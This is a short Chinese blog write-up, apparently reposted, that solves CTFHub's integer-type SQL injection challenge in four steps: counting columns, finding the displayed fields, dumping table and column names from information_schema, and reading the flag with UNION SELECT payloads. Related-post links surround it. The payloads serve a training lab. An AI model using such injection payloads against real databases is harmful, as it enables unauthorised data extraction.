CTFHub SQL 整数型注入[四步]

其他 2021-02-09 09:01:17 阅读次数: 0

判断列数

1 order by 2

判断回显点

1 union select 1,2

判断表名列名

-1 union select 1,group_concat(table_name,'_',column_name) from information_schema.columns where table_schema=database()

在这里插入图片描述

得出结果【两种方法】

-1 union select 1,flag from sqli.flag limit 0,1
-1 union select 1,(select flag from sqli.flag limit 0,1)

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/luminous_you/article/details/110672254

CTFHub SQL 整数型注入[四步]

ctfhub技能树—sql注入—整数型注入

CTFHub-SQL注入整数型注入字符型注入报错注入布尔盲注

[ctfhub]SQL注入

CTFHUB之SQL注入

ctfhub技能树—sql注入—Cookie注入

ctfhub技能树—sql注入—字符型注入

CTFHub Web题学习笔记（SQL注入题解writeup）

【CTF整理】CTFhub技能树-Web-SQL注入

CTFhub时间注入题解

CTFHUB之RCE注入

CTFhub 反射型xss

web安全学习-------2.sql整数型注入

sql整数型注入-sqli第2关

CTFHUB------XSS反射型(WP)

CTFHUB刷题反射型XSS攻击

CTFHub RCE远程代码执行-命令注入笔记

CTFHub misc 四星暴力破解

ctfhub and XCTF

SQL注入——整数注入

CTFHub-web(cookie)

CTFHub(302跳转)

ctfhub 杂项 --icmp

CTFHub SVN泄露

CTFHUB——信息泄露

ctfhub---SSRF

[CTFHUB]迟来的签到题

CTFHub HG泄露

CTFHub .DS_Store

CTFhub—弱密码(web)

今日推荐

周排行

简述ArrayList、Vector、LinkedList三者的特点

什么是 Shell？

湖南省株洲市谷歌高清卫星地图下载

99乘法表（for循环嵌套）

pat-1027

简单算法面试题（附自己的答案）

全国乡镇边界 / 乡镇界线 / 乡镇行政面数据分享

【JAVA】学习记录【递归查询子节点】

CSS里的BFC和IFC的用法

04.CSS3 transition属性及案例分享

每日归档

2025-02-10(0)

2025-02-09(0)

2025-02-08(0)

2025-02-07(0)

2025-02-06(0)

2025-02-05(0)

2025-02-04(0)

2025-02-03(0)

2025-02-02(0)

2025-02-01(0)